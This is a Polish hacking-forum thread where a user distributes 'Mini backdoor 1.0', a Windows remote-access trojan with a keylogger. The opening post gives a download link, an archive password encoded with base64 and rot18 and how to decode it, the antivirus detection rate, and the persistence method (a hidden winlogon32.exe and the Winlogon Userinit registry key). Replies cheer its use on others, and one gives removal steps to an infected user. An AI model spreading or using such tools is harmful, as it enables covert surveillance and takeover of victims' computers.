Mini backdoor 1.0

Status
Zamknięty.

jan64

Użytkownik
Dołączył
Listopad 28, 2009
Posty
49
Autor nie ponosi odpowiedzialności za ewentualne szkody wyrządzone użytkowaniem programu.

Jeżeli szukasz narzędzia do denerwowania znajomych to zamknij aktywne okno/kartę.

Jest to pierwsza wersja więc jest jeszcze dużo niedociągnięć.

Program został napisany w BCB6, więc pliki trochę ważą.

ScreenShot:
klient.gif

Wykrywalność:
6/19
klik


Statystyki:

Klient:

Nazwa Klienta: Klient.exe
Waga Klienta: 268 KB

Serwer:

Nazwa Serwera: serwer.exe
Waga Serwera: 218 KB


Działa na protokole Client>>Serwer czyli nie działa za NATEM

Download:
Kod:
http://rapidshare.com/files/442730489/mbd.rar

hasło:
Kod:
tekst->rot18->base64:
[CODE]dW54cmUucGJ6LmN5
[/CODE]



Zamieszkiwanie:


Dysk:

%windir%\winlogon32.exe

Atrybuty:
Ukryty i systemowy

Rejestr:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
klucz:Userinit
 
Ostatnia edycja:

Fikoł1910

Użytkownik
Dołączył
Grudzień 18, 2010
Posty
11
o co chodzi z tym hasłem?? rozumiem ze ten "dW54cmUucGJ6LmN5" mam zamienic na "rot18" a potem "rot18" na "base69", jeśli tak to coś chyba żle robie, help pls
 

jan64

Użytkownik
Dołączył
Listopad 28, 2009
Posty
49
tekst->rot18->base64
obrazuje proces jakiemu zostało poddane hasło, żeby go odwrócić trzeba zdekodować dW54cmUucGJ6LmN5 przy pomocy algorytmu base64 a wynik zdekodować algorytmem rot18.
Możesz też zgadnąć hasło, nie jest zbyt trudne.
 

Xepex

Użytkownik
Dołączył
Styczeń 16, 2011
Posty
2
Patrząc na hasło początkowo nie wiedziałem ale już po zastosowaniu algorytmu base64 wiedziałem co tam będzie. Program może nie tyle co przydatny, ale na pewno dla kogoś bardzo denerwujący
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Tak zwane P2P.

Mistrzostwo świata to nie jest, ale widać, że troszkę czasu w to włożyłeś.
Oj technologia klient-serwer to nie jest to samo co technologia równorzędna P2P. A to że nie działa za NAT to jest baardzo naciągnięte zdanie bo w takim razie już połowę usług w sieci by nie działało. Bardziej to kwestia typu adresu IP.. Z jednej strony fajnie że ktoś coś jeszcze tworzy, z drugie dokarmiamy frii softłerem przestępców..
 

hayden268

Użytkownik
Dołączył
Sierpień 11, 2011
Posty
14
Mi się podoba. Fajnie kogoś można wkręcić z tym komunikatem. Nawet keylogger działa. Miałem coś podobnego kiedyś ale dysk mi się popsuł więc tym się pobawię :)

@edit
W keylogu troszkę mnie denerwuje
Mia[rALT]lem co[rALT]s
Mógłbyś w następnej wersji coś z tym zrobić?
 
Ostatnia edycja:

jan64

Użytkownik
Dołączył
Listopad 28, 2009
Posty
49
moze w nastepnej wersji bedzie dodatkowa opcja w kliencie, tzn przelaczanie sie miedzy trybami polskie znaki/skroty ;) Niestety trzeba bedzie jeszcze troche poczekac (przerabiam serwer zeby dzialal na viscie/7)
 
Ostatnia edycja:

jan64

Użytkownik
Dołączył
Listopad 28, 2009
Posty
49
Najprawdopodobniej port jest blokowany przez firewall, w tej wersji program potrafi zabić tylko wczesną wersje spybot'a, oraz nie działa na viście/7. Tak w zasadzie ta wersja nie potrafi jeszcze nic zrobić w kwestii omijania zabezpieczeń.
 

Gilotyna-007

Użytkownik
Dołączył
Luty 3, 2012
Posty
151
Trojan ten działa na viście sam używałem zarówno serwer jak i klient port prawidłowy jedynie serwer nie został uruchomiony lub został usunięty przez antywirusa a co do hasła nie jest wymagane. Pozdrawiam
 

Arthex

Użytkownik
Dołączył
Lipiec 10, 2012
Posty
15
Witam , przez pomyłkę uruchomiłem plik serwer.exe na moim komputerze da się go jakoś wyłączyć ? oglądałem w procesach (nie znalazłem serwer.exe) Dzięki za pomoc.
 

fortowiec225

Użytkownik
Dołączył
Maj 20, 2012
Posty
149
Najpierw usuń z rejestru [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] klucz: Userinit, uruchom ponownie komputer, a następnie otwórz %windir% przez uruchom z menu start i usuń plik winlogon32.exe.
 

Bez

Użytkownik
Dołączył
Wrzesień 4, 2012
Posty
8
Witam .
Na czym polega ten program ?
Czy tą wiadomość/komunikat co chce wysłać blikiej osobie zostanie dostarczony ? i w jaki sposób ?
 
Status
Zamknięty.
Do góry Bottom